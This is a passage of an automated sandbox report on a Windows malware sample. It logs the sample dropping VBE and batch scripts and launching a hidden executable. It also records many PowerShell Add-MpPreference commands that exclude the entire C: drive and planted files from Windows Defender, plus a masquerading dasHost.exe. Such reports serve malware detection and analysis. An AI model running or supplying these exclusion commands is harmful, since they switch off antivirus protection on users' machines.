                                    Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exeCode function: 0_2_00F28EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00F28EBD
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeMemory allocated: page read and write | page guardJump to behavior

                                    HIPS / PFW / Operating System Protection Evasion

                                    barindex
                                    Adds a directory exclusion to Windows Defender
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Adobe\Acrobat DC\Acrobat\AaHCyFZRuOMjGDqdgJ.exe'
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\ssh\AaHCyFZRuOMjGDqdgJ.exe'
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows sidebar\Gadgets\AaHCyFZRuOMjGDqdgJ.exe'
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\common files\Microsoft Shared\dasHost.exe'
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\Documents\My Pictures\AaHCyFZRuOMjGDqdgJ.exe'
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe'
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'Jump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'Jump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'Jump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'Jump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'Jump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'Jump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'Jump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'Jump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'Jump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'Jump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'Jump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'Jump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Adobe\Acrobat DC\Acrobat\AaHCyFZRuOMjGDqdgJ.exe'Jump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\ssh\AaHCyFZRuOMjGDqdgJ.exe'Jump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows sidebar\Gadgets\AaHCyFZRuOMjGDqdgJ.exe'Jump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\common files\Microsoft Shared\dasHost.exe'Jump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\Documents\My Pictures\AaHCyFZRuOMjGDqdgJ.exe'Jump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe'Jump to behavior
                                    Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\GgQkil7dD38i66IF6CgYN1iKH8yPMrkKOsB0R1MTAIce7pdb.vbe" Jump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\PniGsaMva0WDN2bCUuIn757jtMvPYPCKlQoP3qJ.bat" "Jump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe "C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor/HyperPortContainerproviderinto.exe"Jump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'Jump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'Jump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'Jump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'Jump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'Jump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'Jump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'Jump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'Jump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'Jump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'Jump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'Jump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'Jump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Adobe\Acrobat DC\Acrobat\AaHCyFZRuOMjGDqdgJ.exe'Jump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\ssh\AaHCyFZRuOMjGDqdgJ.exe'Jump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows sidebar\Gadgets\AaHCyFZRuOMjGDqdgJ.exe'Jump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\common files\Microsoft Shared\dasHost.exe'Jump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\Documents\My Pictures\AaHCyFZRuOMjGDqdgJ.exe'Jump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe'Jump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\6XMNLNVLzg.bat" Jump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe "C:\Program Files (x86)\common files\Microsoft Shared\dasHost.exe"
                                    Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exeCode function: 0_2_00F1F654 cpuid 0_2_00F1F654
                                    Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_00F1AF0F
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeQueries volume information: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe VolumeInformationJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
